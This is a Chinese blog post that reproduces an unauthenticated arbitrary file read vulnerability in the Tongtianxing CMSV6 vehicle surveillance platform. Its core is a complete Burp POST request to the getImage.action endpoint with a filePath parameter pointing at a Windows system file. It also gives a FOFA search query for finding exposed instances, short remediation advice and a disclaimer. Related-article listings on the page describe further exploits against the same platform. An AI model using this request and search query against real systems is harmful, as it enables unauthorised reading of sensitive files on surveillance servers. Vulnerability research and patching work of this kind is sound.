【复现】通天星CMS 安全监控云平台任意文件读取漏洞_60

最新推荐文章于 2024-04-11 14:16:19 发布
最新推荐文章于 2024-04-11 14:16:19 发布
阅读量676 收藏 11
点赞数 18
分类专栏: 安全漏洞 文章标签: 安全 web安全 系统安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fushuang333/article/details/136349928
版权

目录

一.概述

二 .漏洞影响

三.漏洞复现

1. 漏洞一:

四.修复建议:

五. 搜索语法:

六.免责声明

一.概述

通天星CMSV6拥有以位置服务、无线3G/4G视频传输、云存储服务为核心的研发团队,专注于为定位、无线视频终端产品提供平台服务,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。

二 .漏洞影响

        通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容,往往能够使攻击者从服务器上获取敏感信息文件,正常读取的文件没有经过校验或者不严格,用户可以控制这个变量读取任意文件。

三.漏洞复现

1. 漏洞一:

(1)漏洞类型:  任意文件读取

(2)请求类型:POST

(3)复现

找到相关系统

请求漏洞点,查看burp响应

burp请求包

POST /808gps/StandardReportMediaAction_getImage.action?filePath=C://Windows//win.ini&fileOffset=1&fileSize=100 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

四.修复建议:

对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。不提供目录遍历服务等。

五. 搜索语法:

1.fofa

body="808gps"

六.免责声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

穿着白衣
关注
  • 18
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
漏洞】鸿运(通天CMSV6车载)主动安全监控平台存在敏感信息泄露漏
失心少年
02-27 286
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!鸿运(通天CMSV6车载)主动安全监控平台对计算资源、存储资源、网络资源、应用服务进行7*24小时全时区、多地域、全方位、立体式、智能化的IT运维监控,保障IT系统安全、稳定、可靠运行。
漏洞通天CMSV6车载监控平台getImage任意文件读取漏洞
晚风不及你
03-04 706
深圳市通天科技有限公司,是一家以从事计算机、通信和其他电子设备制造业为主的企业。通天车载视频监控平台软件拥有多种语言版本。应用于公交车车载视频监控、校车车载视频监控、大巴车车载视频监控、物流车载监控、油品运输车载监控、警车车载视频监控等公共交通上。
漏洞通天CMSV6信息泄露漏洞
rm -rf *
11-10 248
东莞市通天软件科技有限公司(通天CMSV6)拥有以位置服务、无线3G/4G视频传输、存储服务为核心的研发团队,专注于为定位、无线视频终端产品提供平台服务,通天-CMSV6 list 存在信息泄露漏洞
漏洞通天CMSV6车载视频监控平台存在文件上传漏洞
https://blog.echo234.cn/
03-27 1215
通天CMSV6车载视频监控平台是东莞市通天软件科技有限公司研发的监控平台通天CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台通天科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天CMSV6车载视频监控平台存在文件上传漏洞
漏洞通天CMSV6车载监控平台FTP匿名访问
晚风不及你
01-05 624
深圳市通天科技有限公司,是一家以从事计算机、通信和其他电子设备制造业为主的企业。通天车载视频监控平台软件拥有多种语言版本。应用于公交车车载视频监控、校车车载视频监控、大巴车车载视频监控、物流车载监控、油品运输车载监控、警车车载视频监控等公共交通上。
74cms v4.2.X任意文件读取漏洞
09-06
影响版本: 74cms v4.2. 74cms v4.2 74cms v4.2.3 74cms v5.0.1 有任意删除文件漏洞和SQL漏洞,有poc的过程。
Adminer≤4.6.2任意文件读取漏洞1
08-03
Adminer≤4.6.2 任意读取漏洞0x01 前SQLite、PostgreSQL 等众多主流数据库,类似于 phpMyAdmin 的 MySQL 管理客
eyoucms V1.0.4 后台任意文件读取漏洞1
08-03
漏洞简介:易优cms企业建站系统是由php+mysql开发的一套专门用于中小企业网站建设的开源cms。可以用来快速建设一个企业网站( PC,手机,微信都可以访问
鸿运(通天CMSV6车载)主动安全监控平台任意文件读取
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
02-27 546
鸿运主动安全监控平台对计算资源、存储资源、网络资源、应用服务进行7*24小时全时区、多地域、全方位、立体式、智能化的IT运维监控,保障IT系统安全、稳定、可靠运行。鸿运主动安全监控平台StandardReportMediaAction_getImage存在任意文件读取漏洞,攻击者可利用该漏洞读取系统敏感文件。鸿运(通天CMSV6车载)主动安全监控平台
通天CMSV6 车载视频监控平台信息泄露漏洞
weixin_52204925的博客
02-24 1505
通天CMSV6 车载视频监控平台信息泄露漏洞
鸿运(通天CMSV6车载)主动安全监控平台敏感信息泄露漏洞
做自己喜欢的事,并将其发挥到极致!
02-28 883
鸿运主动安全监控平台对计算资源、存储资源、网络资源、应用服务进行7*24小时全时区、多地域、全方位、立体式、智能化的IT运维监控,保障IT系统安全、稳定、可靠运行。鸿运(通天CMSV6车载)主动安全监控平台存在敏感信息泄露漏洞
通天CMSV6车载视频监控平台 getImage 任意文件读取漏洞
0xSec
02-26 1087
通天CMSV6车载视频监控平台StandardReportMediaAction_getImage.action接口处任意文件读取漏洞,未经身份认证的攻击者可以通过此漏洞获取系统内部敏感文件信息,使系统处于极不安全状态。
漏洞通天CMSV6车载视频监控平台 druid存在默认口令漏洞
https://blog.echo234.cn/
03-27 387
通天CMSV6车载视频监控平台是东莞市通天软件科技有限公司研发的监控平台通天CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台通天科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天CMSV6车载视频监控平台 druid存在默认口令漏洞
通天CMSV6车载定位监控平台 MobileAction 文件读取漏洞
0xSec
12-16 1202
通天CMSV6车载视频监控平台MobileAction_downLoad.action 接口处任意文件读取漏洞,未经身份认证的攻击者可以通过此漏洞获取系统内部敏感文件信息,使系统处于极不安全状态。
【1day漏洞通天CMSV6车载视频监控平台默认口令漏洞
qq_34780861的博客
03-27 328
鸿运主动安全监控平台对计算资源、存储资源、网络资源、应用服务进行7*24小时全时区、多地域、全方位、立体式、智能化的IT运维监控,保障IT系统安全、稳定、可靠运行。
通天CMSV6车载视频监控平台 downloadLogger.action 任意文件读取漏洞
最新发布
0xSec
04-11 394
通天CMSV6车载视频监控平台downloadLogger.action接口处任意文件读取漏洞,未经身份认证的攻击者可以通过此漏洞获取系统内部敏感文件信息,使系统处于极不安全状态。
万户oa officeserver.jsp任意文件上传漏洞
12-22
这是一个常见的漏洞,攻击者可以利用它上传恶意文件到服务器上,从而对系统进行攻击。首先,攻击者需要找到目标系统上的OA officeserver.jsp文件,并确定该文件存在上传漏洞。接下来,攻击者可以通过浏览器或其他工具访问officeserver.jsp文件,并上传恶意的文件,比如Webshell文件。 在上传过程中,攻击者可能需要绕过一些安全控制,可能需要修改请求头或使用特定的文件格式来欺骗服务器。一旦成功上传了恶意文件,攻击者就可以利用它来执行任意的命令,比如查看、修改和删除服务器上的文件,甚至获取系统权限。 为了防止这种漏洞的发生,系统管理员可以采取一些措施,比如限制上传文件的类型和大小、检查上传文件的内容、限制上传文件的访问权限等。此外,及时更新系统补丁,加强对系统的监控和日志审计也是非常重要的。对于已知的漏洞,及时修和更新系统也是必不可少的。 总的来说,要防范万户OA officeserver.jsp任意文件上传漏洞,就需要管理员有意识地加强对系统的安全防护,加强对漏洞的排查和修,以及加强对系统的监控和审计。这样才能更好地保护系统和信息安全

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

穿着白衣

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值